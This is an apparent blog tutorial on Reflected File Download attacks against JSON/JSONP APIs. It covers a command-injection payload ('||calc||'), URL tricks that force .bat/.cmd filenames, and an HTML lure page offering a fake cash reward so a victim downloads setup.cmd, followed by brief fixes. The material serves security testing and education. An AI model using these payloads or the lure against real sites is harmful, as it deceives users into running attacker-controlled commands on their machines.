Reflected File Download(RFD) Vulnerability. What? How?
What is Reflected File Download or RFD?
Reflected File Download(RFD) is an attack technique which might enables attacker to gain complete access over a victim’s machine by virtually downloading a file from a trusted domain (like Google.com & Bing.com).This web attack technique has been discovered by Oren Hafif, a Trustwave SpiderLabs security researcher in 2014.
Where to check?
JSON and JSONP APIs are the main check points for RFD, most of the modern web applications are using this techniques.With help of tools like Burp Suite or OWASP zap you will be able to find the candidates for testing.
Ex:
https://some.website.com/api/v1.0/get_user_profile
How to test?
RFD testing can be divided into 3: Reflected, Filename & Download.
1.Reflected
Step:1
Validate the response of JSON/JSONP APIs and check whether any user input is getting reflected.
Ex: Request -
https://some.website.com/api/v1.0/get_user_profile
Response -
{
“data”: {
“id”: “1239985”,
“domain”: “website.com”,
“ph”: “6456787984”,
“first_name”: “DemoTest”,
“last_name”: “LastRFD”,
“version”: “5”,
}
}
In the example you can see that first_name, last_name and ph are getting reflected in the JSON response.
Step:2
Now, enter the RFD payload rfd”||calc|| into first_name and last_name field. Validate the JSON/JSONP response, if its reflected back like rfd\”||calc|| then there is possibility of RFD.
To verify it completely, copy and save the response as filename.bat . Open it with cmd prompt , you can see window calc is getting popped up.
Ex Response:
{
“data”: {
“id”: “1239985”,
“domain”: “website.com”,
“ph”: “6456787984”,
“first_name”: “rfd\”||calc||”,
“last_name”: “rfd\”||calc||”,
“version”: “5”,
}
}
So, Reflection is confirmed. We need to exploit it.
2.Filename
Challenging part. If we are hitting the JSON/JSONP API url in IE 11 we can see that response will get downloaded as somefileName.json. Filename dependents mainly on http Content-Disposition header and URL.
To exploit this vulnerability, we should be able to change the file format to .cmd, .bat or .exe in order to get executed. How?
Ex: Content-Disposition: userprofile.json
File will be downloaded with same name mentioned in the Content-Disposition header. So we can’t exploit it. We need to move to next possibility like response without Content-Disposition header.
In the absence of a filename attribute returned within a Content-Disposition response header, browsers are forced to determine the name of a downloaded file based on the URL.
Ex: https://some.website.com/api/v1.0/get_user_profile
get_user_profile.json
We can bypass this filename by using below payloads:
get_user_profile.bat
get_user_profile;setup.bat
get_user_profile/setup.bat
get_user_profile;/setup.bat
get_user_profile;/setup.bat;
3.Download
HTML Template:
<! DOCTYPE html>
<html>
<body>
<p>Click the Image and open the file: You will be rewarded with $800<p><a href=”https://some.website.com/api/v1.0/get_user_profile/setup.cmd?" download><img border=”0" src=”https://some.website.com/api/v1.0/get_user_profile/setup.cmd?" alt=”8000 Dollars” width=”104" height=”142"></a>
</body>
</html>
Open the html page click the link, file will be downloaded as setup.cmd.
How to fix this?
- Use “Content-Disposition” header to force the filename name.
- Use CSRF tokens
- Implement Security Headers for all APIs
References:
